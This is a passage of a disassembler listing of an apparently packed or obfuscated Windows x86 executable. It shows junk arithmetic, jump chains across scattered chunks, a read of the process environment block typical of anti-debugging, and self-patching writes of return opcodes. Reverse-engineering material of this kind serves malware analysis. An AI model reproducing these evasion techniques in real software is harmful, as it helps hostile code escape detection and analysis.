		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, large fs:30h
		add	eax, 2
		call	sub_43F0A5
sub_45B4CB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_457042

loc_45B4DE:				; CODE XREF: sub_457042-C4E4j
		jmp	loc_43D4BE
; END OF FUNCTION CHUNK	FOR sub_457042
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_268. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460E8

loc_45B4E4:				; CODE XREF: sub_4460E8+19j
		jmp	loc_44B64B
; END OF FUNCTION CHUNK	FOR sub_4460E8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_196. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45B4EA:				; CODE XREF: y2kk37jd:004581F9j
		jmp	locret_4488B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_45B4EF:				; CODE XREF: sub_44201B+7445j
		jmp	loc_4574F1
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------

loc_45B4F4:				; CODE XREF: y2kk37jd:0044C58Aj
		xchg	ebx, [esp]
		push	edx
		mov	edx, eax
		xchg	edx, [esp]
		mov	eax, ecx
		xchg	eax, [esp]
		push	ebx
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_45B503:				; CODE XREF: sub_43F770:loc_44A474j
		jmp	sub_43B765
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
		adc	esi, ecx
		jz	loc_43D93E
		jmp	sub_44CDD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_45B515:				; CODE XREF: sub_4490B4:loc_44E618j
		jz	loc_4552E3

loc_45B51B:				; CODE XREF: y2kk37jd:0043F45Dj
		jmp	loc_448235
; END OF FUNCTION CHUNK	FOR sub_4490B4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_288. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	edx, 7FF63DF2h
		jmp	sub_441C78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44461D

loc_45B52B:				; CODE XREF: sub_44461D:loc_45A507j
		push	ecx
		push	edi
		push	0C36D68C4h
		pop	edi
		jmp	loc_44D05F
; END OF FUNCTION CHUNK	FOR sub_44461D
; ---------------------------------------------------------------------------
		xor	edi, 0A9D2B899h
		or	eax, 5C2C63DCh
		jmp	sub_44700D
; ---------------------------------------------------------------------------

loc_45B549:				; CODE XREF: y2kk37jd:0043EA5Bj
					; y2kk37jd:loc_4502DBj
		push	6C41BD9Eh
		pop	eax
		and	eax, 94A9AE86h
		or	eax, 745D5406h
		rol	eax, 0Dh
		jmp	loc_44A2EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A53

loc_45B563:				; CODE XREF: sub_451A53:loc_451A5Ej
		mov	ds:dword_44665C, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_451A53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D6A5

loc_45B56A:				; CODE XREF: sub_44D6A5+57DEj
		jmp	loc_44ED32
; END OF FUNCTION CHUNK	FOR sub_44D6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B3F

loc_45B56F:				; CODE XREF: sub_454B3F-12501j
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_454B3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_45B574:				; CODE XREF: sub_43F2F2+AE54j
					; sub_445226+E8AFj
		rol	eax, 10h
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		push	esi
		jmp	loc_44424D
; END OF FUNCTION CHUNK	FOR sub_43F2F2

; =============== S U B	R O U T	I N E =======================================



sub_45B583	proc near		; DATA XREF: sub_43BF31+13C9Do

; FUNCTION CHUNK AT 0043FD45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448F75 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A2D8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450885 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BA90 SIZE 0000000B BYTES

		cmp	dword ptr [ebp-4], 100h
		jnz	loc_43BF3A
		jmp	loc_43FD45
sub_45B583	endp

; ---------------------------------------------------------------------------
		mov	eax, edx
		jmp	sub_45157A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_45B59C:				; CODE XREF: sub_454C24:loc_4478B3j
		or	esi, 3BF9394Fh
		add	esi, 0C444A33Dh
		mov	[esi], eax
		pop	esi
		lea	eax, sub_4445D2
		mov	byte ptr [eax],	0C3h
		jmp	sub_4445D2
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------

loc_45B5B9:				; CODE XREF: y2kk37jd:loc_45A612j
		mov	eax, [esp]
		jmp	loc_450C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451682

loc_45B5C1:				; CODE XREF: sub_451682+Ej
		mov	edx, [esp-4+arg_0]

loc_45B5C4:				; CODE XREF: y2kk37jd:00457228j
		push	eax
		mov	eax, edx
		call	sub_45ADEC
		jmp	loc_4413F2
; END OF FUNCTION CHUNK	FOR sub_451682
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_345. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44723A

loc_45B5D2:				; CODE XREF: sub_44723A+13B9Dj
		jz	loc_4599CA
		jmp	loc_44D2CD
; END OF FUNCTION CHUNK	FOR sub_44723A
; ---------------------------------------------------------------------------
		call	nullsub_474
		xchg	ebp, [esp]
		mov	ecx, ebp
		pop	ebp
		push	offset sub_443EA0
		jmp	locret_4566B4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_45B5F2:				; CODE XREF: y2kk37jd:loc_44C0D8j
					; sub_456D3F-2A9Cj
		mov	edx, [ebp-4]
		call	sub_451A53
		and	esi, 4EEC357Dh
		jno	loc_44C65A
		jmp	sub_45979A
; END OF FUNCTION CHUNK	FOR sub_456D3F

; =============== S U B	R O U T	I N E =======================================



sub_45B60B	proc near		; CODE XREF: sub_4557D7:loc_458D52j

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FDAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D33B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045153B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00457315 SIZE 00000005 BYTES

		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		mov	eax, [ebp-4]
		push	eax
		jmp	loc_43FDAB
sub_45B60B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45B61A:				; CODE XREF: sub_445226:loc_4500E8j
					; y2kk37jd:00450102j
		rol	ecx, 3
		xor	ecx, 0C9EC2A0Fh
		add	eax, ecx
		pop	ecx
		ror	eax, 16h
		push	offset sub_45816B
		jmp	loc_444511
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D302

loc_45B633:				; CODE XREF: sub_44D302:loc_44F096j
		call	sub_448573

loc_45B638:				; CODE XREF: sub_4448E2+15E02j
		jmp	loc_44B73C
; END OF FUNCTION CHUNK	FOR sub_44D302
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_45B63D:				; CODE XREF: sub_4577FE-B763j
		jmp	loc_44D60E
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B41E

loc_45B642:				; CODE XREF: sub_45B41E-13E1Fj
		push	edx
		call	sub_43F618
		mov	eax, 0CEEC89B4h
		push	ecx
		push	28ADD34Ah
		pop	ecx
		xor	ecx, 7550CE45h
		jmp	loc_4421E7
; END OF FUNCTION CHUNK	FOR sub_45B41E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443360

loc_45B65F:				; CODE XREF: sub_443360:loc_45C456j
		cmp	byte ptr [ebp-5], 0
		jnz	loc_43B9A3
		jmp	loc_45227C
; END OF FUNCTION CHUNK	FOR sub_443360
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_45B66E:				; CODE XREF: sub_44B814+521Fj
		cmp	edx, 58DA9746h
		jmp	loc_456E6C
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
		push	eax
		mov	eax, edi
		xchg	eax, [esp]
		push	1C7D49F2h
		xchg	ebp, [esp]
		jmp	loc_4588DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580F2

loc_45B68C:				; CODE XREF: sub_4580F2-1C37Fj
		push	offset loc_453E42
		jmp	nullsub_510
; END OF FUNCTION CHUNK	FOR sub_4580F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45921B

loc_45B696:				; CODE XREF: sub_45921B:loc_450D44j
		jz	loc_43D7CE
		mov	eax, ds:dword_4470B8
		mov	eax, [eax]
		mov	ds:dword_4470C4, eax
		jmp	loc_43EB3E
; END OF FUNCTION CHUNK	FOR sub_45921B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_45B6AD:				; CODE XREF: sub_43B0F5:loc_44112Bj
		mov	eax, [ebp-8]
		shr	eax, 6
		xor	[ebp-8], eax
		inc	dword ptr [ebp-0Ch]
		jmp	loc_44F637
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_45B6BE:				; CODE XREF: sub_4448E2-8284j
		mov	edi, [esi]
		ror	ebp, 17h
		adc	esi, ebp
		shl	eax, 8
		jmp	loc_452F6F
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E0DE

loc_45B6CD:				; CODE XREF: sub_43E0DE+96EDj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_45ABA3
; END OF FUNCTION CHUNK	FOR sub_43E0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_45B6D9:				; CODE XREF: sub_44B79D:loc_4529B8j
		shl	ebx, 17h
		sbb	ecx, 51E0B7FFh
		jnb	loc_43D6FB
		cdq
		jnp	loc_44F665
		jmp	sub_43BB55
; END OF FUNCTION CHUNK	FOR sub_44B79D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C326

loc_45B6F5:				; CODE XREF: sub_43C326:loc_44D64Fj
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		js	loc_45B2B9
		push	offset sub_440FC9
		jmp	loc_45C5AC
; END OF FUNCTION CHUNK	FOR sub_43C326
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_45B70D:				; CODE XREF: sub_44EE3D-31A8j
		sbb	ecx, 0E2DDBB38h
		sub	ebp, 0FA5A118h
		sbb	ebx, edx
		popf

loc_45B71C:				; CODE XREF: sub_44EE3D:loc_45793Dj
		call	sub_45405E
		mov	edx, 7DA6ACC0h
		push	ecx
		jmp	loc_455984
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_45B72C:				; CODE XREF: sub_45136B-D0B1j
		and	ecx, ebp

loc_45B72E:				; CODE XREF: sub_45136B:loc_44E26Aj
		movzx	eax, word ptr [ebp-6]
		mov	[ebp-1Ch], eax
		jmp	loc_43D652
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_45B73A:				; CODE XREF: sub_449E69:loc_449E75j
		cmp	dword ptr [ebp-20h], 0
		jge	loc_443E36
		jmp	loc_44525D
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45B749:				; CODE XREF: sub_445226:loc_446F50j
		mov	[eax], ebp
		jmp	loc_44D4DA
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_45B750:				; CODE XREF: sub_43B8D6:loc_44725Fj
					; sub_446E19+1448Aj
		or	edx, 8FDD5503h
		sub	edx, 0C193F0C9h
		rol	edx, 0Bh
		xor	edx, 0BE26C6CEh
		xor	eax, edx
		push	offset sub_43F285
		jmp	nullsub_389
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------

loc_45B771:				; CODE XREF: y2kk37jd:00440D76j
		jz	loc_44650D
		jmp	loc_44BD48
; ---------------------------------------------------------------------------

loc_45B77C:				; CODE XREF: y2kk37jd:0043B515j
		xchg	ebx, edi
; START	OF FUNCTION CHUNK FOR sub_43B4F9

loc_45B77E:				; CODE XREF: sub_43B4F9+Cj
		and	eax, 0A1A6A7D7h
		xor	eax, 0B938FA96h
		add	eax, ebp
		add	eax, 0C6618359h
		mov	eax, [eax]
		jmp	loc_44735D
; END OF FUNCTION CHUNK	FOR sub_43B4F9
; ---------------------------------------------------------------------------
		xor	esi, 33AD6637h
		jmp	loc_442711
; ---------------------------------------------------------------------------

loc_45B7A4:				; CODE XREF: y2kk37jd:004544F9j
		jle	loc_444E19

; =============== S U B	R O U T	I N E =======================================



sub_45B7AA	proc near		; CODE XREF: sub_43F75D:loc_43C597p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B80B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043B9B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CD7C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D943 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DFDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E85F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F3F3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FA81 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440521 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00440965 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00440F44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004411F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004413B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004428C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442A06 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044352D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443D37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444811 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00445DC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004464EE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004465B7 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447453 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00448ECE SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00449075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449C35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A686 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044A824 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044ABBE SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044ABED SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B88B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B8A0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BA16 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BD55 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CD8A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044D354 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D810 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E77E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EAF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FBDF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004503FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C11 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004512A1 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004530BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004533E7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045346B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453A99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004542E6 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00454D5B SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00454FE8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004551C0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00455C8C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455DA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004568AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456FEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004572B7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045730F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00457A0C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045879A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045BC8B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BEF5 SIZE 0000000A BYTES

		xchg	edi, [esp+0]
		pop	edi
		jno	loc_45B86A
		cmp	dword ptr [ebp-4], 2
		jnz	loc_4512A8
		jmp	loc_43FA81
; ---------------------------------------------------------------------------

loc_45B7C3:				; CODE XREF: sub_443AA7+15C51j
		push	offset sub_45981F

loc_45B7C8:				; CODE XREF: sub_44CF38:loc_44E27Bj
		jmp	nullsub_391
; ---------------------------------------------------------------------------
		push	edi
		push	0ECD623E0h
		pop	edi
		sub	edi, 4BC0EC4Ch
		rol	edi, 0Bh
		and	edi, 3A92198Ch
		jmp	loc_444811
; ---------------------------------------------------------------------------

loc_45B7E8:				; CODE XREF: sub_4486B1+30ABj
		xchg	esi, [esp+4+var_4]
		jmp	loc_45A8C2
; ---------------------------------------------------------------------------

loc_45B7F0:				; CODE XREF: sub_446FF7:loc_446FFDj
		pop	edi
		jmp	loc_4503FE
; ---------------------------------------------------------------------------

loc_45B7F6:				; CODE XREF: sub_43DE8Bj
		call	sub_452224

loc_45B7FB:				; CODE XREF: y2kk37jd:004493D2j
		jmp	nullsub_236
; ---------------------------------------------------------------------------

locret_45B800:				; CODE XREF: sub_445EBA:loc_4561D6j
		retn
; ---------------------------------------------------------------------------

loc_45B801:				; CODE XREF: y2kk37jd:004423C9j
		jnz	loc_44CD8A
		jmp	loc_43B80B
; ---------------------------------------------------------------------------

locret_45B80C:				; CODE XREF: sub_44D302+9CB3j
		retn
; ---------------------------------------------------------------------------

loc_45B80D:				; CODE XREF: sub_44DE9F-AD56j
		jmp	loc_44D810
; ---------------------------------------------------------------------------

loc_45B812:				; CODE XREF: y2kk37jd:0043D6A1j
		jmp	loc_44A824
; ---------------------------------------------------------------------------

locret_45B817:				; CODE XREF: sub_44D715-CECAj
		retn
; ---------------------------------------------------------------------------

locret_45B818:				; CODE XREF: sub_43B4EE:loc_43F5B3j
		retn
; ---------------------------------------------------------------------------

loc_45B819:				; CODE XREF: y2kk37jd:0043F0CAj
		jmp	sub_4581BB
; ---------------------------------------------------------------------------

loc_45B81E:				; CODE XREF: sub_457B90-1A2FCj
		jmp	loc_45BC8B
; ---------------------------------------------------------------------------

locret_45B823:				; CODE XREF: sub_43D3EB+1C63Bj
		retn
; ---------------------------------------------------------------------------

loc_45B824:				; CODE XREF: sub_44201B+16B88j
		jmp	loc_44B8A0
; ---------------------------------------------------------------------------

loc_45B829:				; CODE XREF: sub_43B4EE+14043j
		jg	loc_43E3BE
		sbb	ebp, 35E5FCC3h
		xor	ebp, ecx
		mov	esi, [edi]

loc_45B839:				; CODE XREF: y2kk37jd:loc_4484BAj
		jmp	loc_4411F1
; ---------------------------------------------------------------------------

loc_45B83E:				; CODE XREF: sub_4448E2+4BCCj
		mov	[ecx], eax
		sub	edx, 4A645BD2h
		push	edi
		mov	[edx], eax
		jmp	loc_44A8D5
; ---------------------------------------------------------------------------

loc_45B84E:				; CODE XREF: y2kk37jd:00450820j
		jp	loc_443D18
		push	778DB2CFh
		cdq
		jmp	loc_4551C0
; ---------------------------------------------------------------------------

loc_45B85F:				; CODE XREF: sub_45B7AA-5B13j
		ja	nullsub_244
		jmp	loc_4512A8
; ---------------------------------------------------------------------------

loc_45B86A:				; CODE XREF: sub_45B7AA+4j
		cmp	dword ptr [ebp-4], 2
		jnz	loc_4512A8
		jmp	loc_45346B
sub_45B7AA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 6E103E68h
		push	offset sub_44F60F
		jmp	locret_44D034
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456990

loc_45B888:				; CODE XREF: sub_456990-13003j
		jge	loc_4427DB

loc_45B88E:				; CODE XREF: sub_44D6B0+1E76j
		jmp	loc_458B00
; END OF FUNCTION CHUNK	FOR sub_456990
; ---------------------------------------------------------------------------

loc_45B893:				; CODE XREF: y2kk37jd:0044AF69j
		jmp	loc_450A87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451515

loc_45B898:				; CODE XREF: sub_451515-13455j
		jmp	loc_454D79
; END OF FUNCTION CHUNK	FOR sub_451515
; ---------------------------------------------------------------------------
		jle	loc_445B42
		jmp	loc_4475D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B0B

loc_45B8A8:				; CODE XREF: y2kk37jd:loc_4468DBj
					; sub_453B0B-A5F6j
		push	7F4354F0h
		pop	ecx
		add	ecx, 0AE466817h
		cmp	ecx, 7A15836Ah
		jmp	loc_44D0D2
; END OF FUNCTION CHUNK	FOR sub_453B0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457524

loc_45B8BF:				; CODE XREF: sub_457524:loc_450246j
		pop	eax
		add	ebp, 3633F2C8h
		jmp	loc_43E470
; END OF FUNCTION CHUNK	FOR sub_457524
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_45B8CB:				; CODE XREF: sub_445226+131D7j
		jl	loc_4403D1

loc_45B8D1:				; CODE XREF: sub_445656+Aj
					; y2kk37jd:0044B1C7j
		jmp	loc_444DAD
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ebp, [eax]
		xchg	ebp, ecx
		jmp	loc_4403D1
; ---------------------------------------------------------------------------

loc_45B8DF:				; DATA XREF: y2kk37jd:00448A89o
		js	loc_43F14C
		xchg	ebp, [esp]
		mov	edx, ebp
		pop	ebp
		push	offset sub_4512BD
		jmp	locret_43DA7E
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_448BAB
		jmp	loc_44E518
; ---------------------------------------------------------------------------
		add	eax, ecx
		jmp	sub_44894A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A317

loc_45B909:				; CODE XREF: sub_44A317+Aj
		xor	ecx, 8F0623C9h
		add	ecx, 0F1A7CE87h
		xchg	ecx, [esp+0]
		jmp	loc_44941C
; END OF FUNCTION CHUNK	FOR sub_44A317
; ---------------------------------------------------------------------------
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jz	loc_449133
		jmp	loc_45250E
; ---------------------------------------------------------------------------
		sbb	ebx, 4FB22F87h
		jmp	sub_45A47C
; ---------------------------------------------------------------------------
		cmp	esi, ecx
		jmp	loc_445551
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_45B941:				; CODE XREF: sub_442938:loc_44567Bj
		pop	ebx
		jnz	loc_43C6A4
		jmp	loc_44A129
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------

loc_45B94D:				; CODE XREF: y2kk37jd:00454CF2j
		jz	loc_43EA07
		jmp	loc_4534E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_45B958:				; CODE XREF: sub_43F2F2:loc_443C4Dj
		pop	edx
		or	edx, 7C8C4295h
		rol	edx, 2
		add	edx, 0C459CA6h
		jmp	loc_45477B
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_45B96D:				; CODE XREF: sub_456809+330Dj
		xor	eax, 0D633A1DBh
		add	eax, 4C03924h
		add	eax, ebp
		add	eax, 1DD9C400h
		mov	eax, [eax]
		jmp	loc_459F27
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
		mov	eax, 0F34E90C0h
		call	sub_442C3E
		mov	ds:off_41E13C, eax
		lea	eax, loc_43E760
		mov	byte ptr [eax],	0C3h
		jmp	loc_4451F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2EB

loc_45B9A6:				; CODE XREF: sub_43B2EB+3476j
		call	sub_44606C

loc_45B9AB:				; CODE XREF: sub_455A53-DEBEj
		jmp	loc_45A6F9
; END OF FUNCTION CHUNK	FOR sub_43B2EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453969

loc_45B9B0:				; CODE XREF: sub_453969-166F2j
		jmp	nullsub_392
; END OF FUNCTION CHUNK	FOR sub_453969
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_45B9B5:				; CODE XREF: sub_456809:loc_440CC7j
		add	esi, 86F418C1h
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+8+var_8]
		call	sub_442938
		jmp	loc_44659E
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_45B9D0:				; CODE XREF: sub_455DDE-107BAj
		rol	eax, 0Dh
		xchg	edx, esi
		mov	edi, [ebx]
		rol	edx, 10h

loc_45B9DA:				; CODE XREF: sub_455DDE:loc_454763j
		call	sub_45157A

loc_45B9DF:				; CODE XREF: y2kk37jd:loc_44A1B6j
		jmp	nullsub_394
; END OF FUNCTION CHUNK	FOR sub_455DDE
; ---------------------------------------------------------------------------

loc_45B9E4:				; CODE XREF: y2kk37jd:004432DEj
		jmp	loc_45343C
; ---------------------------------------------------------------------------

loc_45B9E9:				; CODE XREF: y2kk37jd:00440DE3j
		jmp	locret_43B5BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E3E

loc_45B9EE:				; CODE XREF: sub_447E3E:loc_443A30j
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		rol	eax, 4
		add	eax, 74E2D0C9h
		call	sub_448CAE

loc_45BA02:				; CODE XREF: sub_43F0A5+10988j
		jmp	loc_4523F6
; END OF FUNCTION CHUNK	FOR sub_447E3E
; ---------------------------------------------------------------------------
		xchg	ecx, esi
		jb	loc_44A07F
		jmp	sub_44B2F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_45BA14:				; CODE XREF: sub_43ED19-15DEj
		push	0EAFC7D17h
		pop	ecx
		add	ecx, 0DC680FA4h
		cmp	ecx, 5CD3CF10h
		jmp	loc_44DE3C
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF5F

loc_45BA2B:				; CODE XREF: sub_43BF5F+1E4FAj
		add	eax, 53089372h
		mov	eax, [eax]
		mov	byte ptr [eax],	64h
		inc	dword ptr [ebp-28h]
		mov	eax, [ebp-28h]
		mov	byte ptr [eax],	6Ch
		jmp	loc_445150
; END OF FUNCTION CHUNK	FOR sub_43BF5F
; ---------------------------------------------------------------------------
		or	ecx, ebp
		jmp	sub_43B4A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_45BA4B:				; CODE XREF: sub_43D412+98E4j
		mov	eax, [esp+4+var_4]
		push	offset loc_452FB2
		jmp	nullsub_439
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------

loc_45BA58:				; CODE XREF: y2kk37jd:loc_44DDC3j
					; y2kk37jd:loc_44E4E0j
		push	esi
		push	0AE25B7C0h
		push	offset sub_44B4E1
		jmp	locret_458060
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B37E

loc_45BA68:				; CODE XREF: sub_43B37E:loc_45A380j
		push	eax
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-1Ch], 0F6h
		setz	al
		call	sub_45024B
		jmp	loc_45252B
; END OF FUNCTION CHUNK	FOR sub_43B37E
; ---------------------------------------------------------------------------
